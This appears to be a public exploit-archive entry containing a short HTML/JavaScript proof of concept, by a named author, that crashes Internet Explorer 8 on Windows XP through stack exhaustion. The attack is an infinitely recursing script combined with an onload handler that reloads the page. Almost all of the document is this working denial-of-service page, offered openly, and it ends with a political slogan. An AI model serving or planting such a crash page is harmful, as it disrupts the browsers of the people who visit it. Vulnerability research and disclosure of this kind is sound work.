Microsoft Internet Explorer 8 suffers from a denial of service vulnerability due to a stack exhaustion issue.
c0206d977f507f789c26838b5b33a945a10259c50ae11b7756dce67dd5c7f7ae
<!-- [+] Microsoft Internet Explorer 8 stack exhaust -->
<!-- -->
<!-- Vuln type: Denial of Service -->
<!-- Author: Todor Donev -->
<!-- Author mail: todor.donev@@gmail.com -->
<!-- -->
<!-- This is simple crash exploit for MS IE8, tested on Windows XP SP3 EN -->
<!-- It's not risk factor !! -->
<!-- -->
<!-- Kind regards Tsvetelina Emirska and all my friends that support me!! -->
<!-- -->
<html>
<body onload="javascript:history.go(0)">
<script>
var x = x();
function x(){
for(var key in x(x));
}
</script>
</html>
<!-- -->
<!-- !!! STOP ACTA !!! STOP PIPA !!! STOP SOPA -->